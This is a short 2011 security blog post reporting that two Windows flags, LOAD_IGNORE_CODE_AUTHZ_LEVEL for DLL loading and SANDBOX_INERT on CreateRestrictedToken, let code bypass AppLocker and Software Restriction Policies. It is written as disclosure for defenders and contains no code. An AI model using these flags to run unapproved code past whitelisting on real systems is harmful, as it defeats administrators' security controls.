Security, et al

Randy's Blog on Infosec and Other Stuff

«  The Art of Detecting Mali... | Eliminate Windows Firewal... »

Back Door Bypasses AppLocker and Software Restriction Policies

Tue, 02 Aug 2011 13:40:25 GMT

Just a quick note about a what looks like a pretty bad backdoor to Windows 7's AppLocker and the older Software Restriction Policies.  I've just learned about it and will be covering it in greater detail in tomorrow's webinar.

It's a backdoor created by Microsoft for when you load a DLL.  Just specify the LOAD_IGNORE_CODE_AUTHZ_LEVEL and AppLocker ignores the DLL.  Furthermore there's a similar flag, SANDBOX_INERT, on the CreateRestrictedToken api that allows you to apparently start a new process with AppLocker disabled as well.

Again, I'll have more on this in tomorrow's webinar.

email this digg reddit dzone
comments (0)references (0)

Live with Dell at RSA 2015
Live with LogRhythm at RSA
Live with Duo Security at RSA 2015
9 Mistakes APT Victims Make

Comments disabled

powered by Bloget™


Recent Blogs